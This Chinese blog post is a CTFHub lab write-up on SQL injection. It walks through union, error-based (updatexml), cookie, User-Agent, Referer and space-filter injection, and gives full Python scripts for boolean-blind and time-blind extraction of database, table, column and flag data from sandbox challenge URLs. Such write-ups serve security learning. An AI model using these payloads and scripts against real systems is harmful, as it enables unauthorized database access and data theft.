CTFUB-SQL注入

最新推荐文章于 2024-03-30 14:41:08 发布
最新推荐文章于 2024-03-30 14:41:08 发布
阅读量200 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/114740628
版权

SQL整数型注入

在这里插入图片描述先查看他是否存在注入,存在注入的。
在这里插入图片描述猜字段数量
在这里插入图片描述发现猜到3的时候出错了,那么就只有两个字段
在这里插入图片描述现在让它报显示位(id必须是查不到的数据才行)
在这里插入图片描述现在分别开始查询数据库信息,表,列的信息
在这里插入图片描述在这里插入图片描述在这里插入图片描述之后发现了flag数据。-1 union select 1,group_concat(flag) from flag 第一个flag是列名,后面的flag是表名
在这里插入图片描述

SQL字符型注入

输入个1之后发现跟之前的有点不一样1的符号补全了。
在这里插入图片描述如果像之前一样 1 order by 3 发现不报错。是因为返回的代码左右引号把中间的代码作为字符串了并没有实现SQL注入。那么接下来引号在要执行的代码前面解决就好了。也就是 1’ order by 3 – ’
在这里插入图片描述其他的步骤都是一样的,就要注意引号的问题就行了,这里我就直接跳到最后一步了。也就是-1’ union select 1,group_concat(flag) from flag – ’
在这里插入图片描述

CTFHUB-报错注入

这个的注入跟之前的注入还有点不一样。要用到updatexml()函数。
updatexml()的作用:它具有查询功能 并且会在xpath处查询 你将语法构造错误 然后它就会将他查询的结果已报错的形式显示出来。
这里有mysql的一些常用语法和函数的作用 那么下面开始正式写这题
要是正常用语法写他只会告诉你查询的对不对并不会返回我们要的信息。
在这里插入图片描述直接用这个语句查表名:-1 union select updatexml(1,concat(0x7e,(select (group_concat(table_name) ) from information_schema.tables where table_schema=‘sqli’),0x7e),1)
在这里插入图片描述
再查列名和flag,分别语句:-1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name)) from information_schema.columns where table_name=‘flag’),0x7e),1)和-1 union select updatexml(1,(select flag from flag),1)
在这里插入图片描述
在这里插入图片描述

布尔盲注入和时间注入

这里要用到脚本了。看的这个博主的脚本
布尔注入的脚本

import requests
import string

url = 'http://challenge-c2f3811b1351ff5a.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'


def database_name():
    name = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_db)
            if mark in r.text:
                name += j
                break
    print('database_name:', name)


database_name()

def table_name():
    list = []
    for i in range(0, 4):
        name = ''
        for j in range(1, 9):
            for k in string.ascii_letters:
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_t)
                if mark in r.text:
                    name += k
                    break
        list.append(name)
    print('table_name:', list)


table_name()

def columns_name():
    list = []
    for i in range(0, 3):
    	name = ''
        for j in range(1, 9):
            for k in string.ascii_letters:
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
                r = requests.get(url_c)
                if mark in r.text:
                    name += k
                    break
        list.append(name)
    print('column_name:', list)

def data():
    name = ''
    for i in range(1, 50):
        for j in range(48, 126):
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
            r = requests.get(url_d)
            if mark in r.text:
                name += chr(j)
                break
    print('data:', name)


data()

时间注入的脚本

import requests
import string
import time

url = 'http://challenge-5ec155a6d22fe332.sandbox.ctfhub.com:10080/?id='


def database_name():
    name = ''
    for i in range(1, 9):
        for j in string.ascii_letters:
            url_db = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
            time_b = time.time()
            r = requests.get(url_db)
            time_f = time.time()
            if time_f-time_b > 2:
                name += j
                break
    print('database_name:', name)


database_name()

def table_name():
    list = []
    for i in range(0, 2):
        name = ''
        for j in range(1, 9):
            for k in string.ascii_letters:
                url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_t)
                time_f = time.time()
                if time_f - time_b > 2:
                    name += k
                    break
        list.append(name)
    print('table_name:', list)


table_name()

def columns_name():
    list = []
    for i in range(0, 1):
        name = ''
        for j in range(1, 9):
            for k in string.ascii_letters:
                url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
                time_b = time.time()
                r = requests.get(url_c)
                time_f = time.time()
                if time_f - time_b > 2:
                    name += k
                    break
        list.append(name)
    print('column_name:', list)


columns_name()

def data():
    name = ''
    for i in range(1, 50):
        for j in range(48, 126):
            url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
            r = requests.get(url_d)
            time_b = time.time()
            r = requests.get(url_d)
            time_f = time.time()
            if time_f-time_b > 2:
                name += chr(j)
                print(name)
                break
    print('data:', name)


data()

把这俩的URL改了就行了。

MYSQL结构

这题跟之前的方法一样不做赘述了。

COOKIE注入

在这个位置进行注入,注入的语法是一样的。
在这里插入图片描述在这里插入图片描述在这里插入图片描述

UA注入

User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。在User-Agent上写注入代码。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Refer注入

抓包发现没有referer,那就新建一个表头作为referer来注入代码。后面就是正常的注入过程.
referer是啥:HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

过滤空格

不让用空格,把空格换成/**/,其他不变正常注入代码。

文章目录

前言

SQL注入大概了解我看着的这个视频SQL注入大概总结了一下SQL注入的方法。

总结

提示:这里对文章进行总结:
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。

熊是本熊
关注
网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 8336
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
CTFUB
m0_56285474的博客
04-26 423
目录 CTF基础知识 WEB 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、CTF基础知识 (一.)CTF简介:CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF是一种流行的信息安全竞赛形式,一般情况下flag拥有固定格式为fla
CTFUB-web前置技能-HTTP协议
ssss39的博客
11-24 432
修改请求方式为CTFHUB。burp抓包,抓第二次的。
CTF相关了解
qq_44841017的博客
04-21 1618
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
【CTF整理】CTFhub技能树-Web-信息泄露-Git泄露
SunnyCat
05-10 3551
【CTF整理】CTFhub-Web-信息泄露-Git泄露 一、 log 进入界面,得到一个url,根据提示直接开干 1、使用dirsearch扫描url,发现url低下存在敏感文件.git python3 dirsearch.py -u <url> -e * 2、使用GitHack进行文件恢复【这里需要将扫描到的.git加在url后面】,然后在GitHack所在目录下的dist目录下得到恢复的文件。 python2 GitHack.py <url> (url格式:http(
sql注入(字符型注入)
2401_82760239的博客
03-30 1173
接下来查看flag表名下的字段名,用-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#首先用-1' union select 1,group_concat(schema_name) from information_schema.schemata #,列出所有的数据库。(或称为系统架构)是非常重要的。
网络安全-sql注入实战-sql-labs(1~10)
09-02
网络安全-sql注入实战-sql-labs(1~10)
python自学教程-12-sql注入和防止sql注入.ev4.rar
最新发布
09-12
python自学教程-12-sql注入和防止sql注入.ev4.rar
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
网络安全-sql注入-sqlmap
09-02
网络安全-sql注入-sqlmap
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
ctfhub_sql注入
lyy0xfff的博客
07-27 319
CTFHub-SQL注入 文章目录CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入过滤空格UA注入Refer注入 整数型注入 由题意输入1,可以看到回显位置有两个,所以猜解有两列。 1 order by 3 1 order by 2 可以得知为2列,开始爆破数据 数据库、用户名 表名 -1 union select 1,(select group_concat(table_name) from information_schema.tables wh
Ubuntu 20.04安装SQL Server
par@ish的博客
02-25 3032
SQL Server 目前在 Red Hat Enterprise Server、SUSE Linux Enterprise Server 和 Ubuntu 上受支持。还支持使用 Docker 在容器中运行。
CTFHUB--技能树--SSRF全解(上篇)
errorr0
05-11 2277
SSRF技能树
CTFHUB技能树(全详细解析含进阶)
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
CTFHub-web(基础认证)
分享与记录
03-26 8985
发现题目需要登录,先任意输入admin/admin进行登录尝试。没什么反应。抓包看数据。可以看见一条特殊字符串Basic realm="Do u know admin ?,暂时没有其他线索,我们假设用户名就是admin,然后进行暴力破解。 Basic表示基础认证,字符串格式xxxxxxxxx==大概率为Base64编码 Base64解码得到开始尝试输入的账号和密码 将报文发送到Intrude...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
CTFHub通关
weixin_43184518的博客
07-06 8703
CTFHub通关 这篇文章主要为我在ctfhub上的通关过程,作为记录方便以后查看。
CTFHUB(WEB) 布尔注入
qq_54929891的博客
09-21 1331
麻烦的来了诶,装作不知道是布尔注入,依然按照题目意思输入1看看 从这里可以知道我们不需要打引号 哦对了,我们先应该判断是否有注入点,利用真假语句来判断id的值是否可以改变sql语句的变化 通过恒真语句and 1=1和恒假语句and 1=2得知id的值可以改变sql语句的走向,说明这里存在注入点,然后便上网查询一下布尔注入应该要用到哪些函数语句 length()返回长度 这里弊端就是因为都是ctfhub上面的题,只是注入方式改变,数据库名啥的没变,所以只是为了让我们动手用这种方法..
wireshark-sql注入探测
06-10
Wireshark是一个流量分析工具,可以用于SQL注入探测。下面是一些探测SQL注入攻击的步骤: 1. 启动Wireshark,并开始捕获网络流量。 2. 使用过滤器来过滤HTTP/HTTPS流量,以便找到可能存在SQL注入攻击的流量。 3. 找到HTTP/HTTPS请求中的参数,这些参数可能会受到SQL注入攻击。可以通过查看HTTP请求和响应报文来确定参数的名称和值。 4. 对于可能受到SQL注入攻击的参数,可以使用Wireshark的“Follow TCP Stream”功能,查看完整的HTTP请求和响应报文,以便确认是否存在SQL注入攻击。 5. 在HTTP请求中,可以检查参数的类型和格式,以查看是否存在潜在的SQL注入漏洞。例如,可以检查参数是否为数字类型或字符串类型,是否包含特殊字符等。 6. 在HTTP响应中,可以检查响应的内容,以查看是否存在异常或错误信息,例如SQL语法错误或数据库连接错误等。 7. 如果发现SQL注入漏洞,需要及时修复漏洞,例如对输入参数进行严格的输入检查和过滤,使用参数化查询等措施,以避免SQL注入攻击。 总之,Wireshark是一个功能强大的流量分析工具,可以用于SQL注入探测。通过对HTTP/HTTPS流量的分析和检查,可以发现潜在的SQL注入漏洞,并及时修复漏洞,以保护应用程序的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值